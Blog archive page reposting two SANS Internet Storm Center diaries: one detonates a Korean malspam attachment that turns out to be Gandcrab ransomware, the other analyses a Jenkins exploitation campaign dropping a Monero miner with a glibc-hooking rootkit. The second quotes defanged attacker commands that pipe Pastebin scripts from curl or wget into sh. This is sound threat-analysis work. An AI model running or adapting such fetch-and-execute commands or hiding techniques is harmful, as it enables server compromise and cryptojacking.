Blog

Archive for May 7th, 2019

Email roulette, May 2019, (Wed, May 8th)

Introduction

For today’s diary I play a game of email roulette.  My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware.  I acquired a recent malspam example through VirusTotal (VT) Intelligence.  Let’s see what the roulette wheel give us today!

Searching for malspam attachments in VT Intelligence

VT Intelligence is a subscription server, and from what I understand, it’s fairly expensive.  Fortunately I have access through my employer.  In the VT Intelligence search window, I used the following parameters:

tag:attachment fs:2019-05-07+ p:3+

This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious.  After the results appeared, I sorted by the most recent submissions.


Shown above:  Searching and sorting in the VT Intelligence portal.


Shown above:  Results sorted by most recent at the time of my search.

The three most recent results I saw were 7-zip archives (.7z files).  The file names did not use ASCII characters, but were base64 encoded.  The base64 string represents UTF-8 characters, where the format is name:"=?utf-8?B?[base64 string]?="

I picked the most recent result and selected the relations tab, which revealed the associated malspam.  Then I retrieved that email from VT Intelligence.


Shown above:  Pivoting on the attachment to find its parent email.


Shown above:  The email opened in Thunderbird on a Windows 7 host.

The attached 7-zip archive contained 3 files with different names, but they were all the same file hash, so they were the same malware.  I extracted them and ran one on a vulnerable Windows host.  The result was a Gandcrab ransomware infection.


Shown above:  Encrypted files and the ransom note on my infected Windows host.

Indicators

The following are indicators associated with this infection:

SHA256 hash: 39f97e750a8ebcc68a5392584c9fd8edc934e978d6495d3ae430cb7ee3275ffe

  • File size: 157,810 bytes
  • File description: Example of Korean malspam (.eml file) pushing Gandcrab

SHA256 hash: 5444841becddce7ef2601752df63db2a9d067d46a359d8b0288da2ebf494ff41

  • File size: 112,792 bytes
  • File description: 7-zip archive (.7z file) attached to Korean malspam

SHA256 hash: df53498804b4e7dbfb884a91df7f8b371de90d6908640886f929528f1d6bd0cc

  • File size: 173,568 bytes
  • File description: Gandcrab executables (.exe files) extracted from the above .7z archive
  • Any.Run sandbox analysis

Final words

This round of email roulette gave us a Gandcrab ransomware infection.  What type of malware might I find next?  Perhaps we’ll know when I try this again next month for another diary.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Vulnerable Apache Jenkins exploited in the wild, (Tue, May 7th)

An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.

The exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects Stapler Web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.

Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.

After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.

Vulnerability Exploitation

In the picture below, you can see the exploitation occurring. 

Notice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:

(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh

The content of the paste ‘wDBa7jCQ’ is no longer available, but the content was another paste:

(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed ‘s/r//’|sh

The content of ‘D8E71JBJ’ paste is no longer available also, but it was the shell script down in following images.

The Dropper

The dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.

After analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is an open source software and there are many ways UPX can be modified to make it hard to unpack the file using regular UPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different forms to fix ELF headers in order to unpack files.

Fortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from ‘UPX’ to some other three letters. Thus, reverting it to UPX in different parts of the binary, it was possible to unpack the binary with the regular version of UPX.

The Glibc hooks

The other interesting part is the way ‘Kerberods’ acts to persist and hide itself if has root privileges on the machine.

If it is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify its behavior. In other words, it acts like a rootkit.

In the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’ to act in a different way. The intention is to avoid anyone (including root) to be able to open the binary ‘khugepageds’, which is the cryptominer, the ‘ld.so.preload’, which is the file that loads the malicious library and the library ‘libpamcd.so’ itself.

 

Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.

 

Indicators of Compromise (IOCs)

Filesystem
74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
Bab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f

43a00e0dd57d110d1c88b18234185267ca2a79f8ae1905bef4ba225144c992d2
 

Network
SYSTEMTEN[.]ORG:51640
 


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →